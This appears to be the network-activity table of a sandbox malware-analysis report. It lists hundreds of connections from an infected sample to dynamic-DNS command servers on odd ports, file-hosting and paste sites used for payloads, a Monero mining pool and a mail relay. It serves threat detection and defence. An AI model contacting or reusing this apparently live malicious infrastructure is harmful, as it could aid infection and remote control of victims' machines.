| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | 135.1.85.104.in-addr.arpa | udp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 185.172.128.100:80 | 185.172.128.100 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:8118 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:8118 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 107.175.229.139:8087 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | mail.zqamcx.com | udp |
| GB | 78.110.166.82:587 | mail.zqamcx.com | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | gservicese.com | udp |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| US | 8.8.8.8:53 | 82.166.110.78.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| GB | 78.110.166.82:587 | mail.zqamcx.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | listpoints.click | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 49ddc5da-17a4-40a8-ac72-a4299ebd1726.uuid.dumperstats.org | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 139.229.175.107.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | server11.dumperstats.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| BG | 185.82.216.111:443 | server11.dumperstats.org | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 74.125.128.127:19302 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | walkinglate.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:443 | walkinglate.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| US | 8.8.8.8:53 | 127.128.125.74.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.216.82.185.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.click | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 8.8.8.8:53 | server11.dumperstats.org | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.82.216.111:443 | server11.dumperstats.org | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 212.47.253.124:14433 | xmr-eu1.nanopool.org | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | 124.253.47.212.in-addr.arpa | udp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 51.68.190.80:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 170.34.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.190.68.51.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | gservicese.com | udp |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 138.201.120.172:15648 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| BG | 185.82.216.111:443 | server11.dumperstats.org | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | stun1.l.google.com | udp |
| FI | 64.233.164.127:19302 | stun1.l.google.com | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 127.164.233.64.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.ljwixsb.top | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 138.201.120.172:15648 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| US | 8.8.8.8:53 | www.mobdigim.com | udp |
| DE | 136.243.92.92:80 | www.mobdigim.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 92.92.243.136.in-addr.arpa | udp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 194.49.94.152:50500 | tcp | |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | www.finebb.net | udp |
| RU | 91.194.2.86:80 | www.finebb.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 86.2.194.91.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.194.2.86:80 | www.finebb.net | tcp |
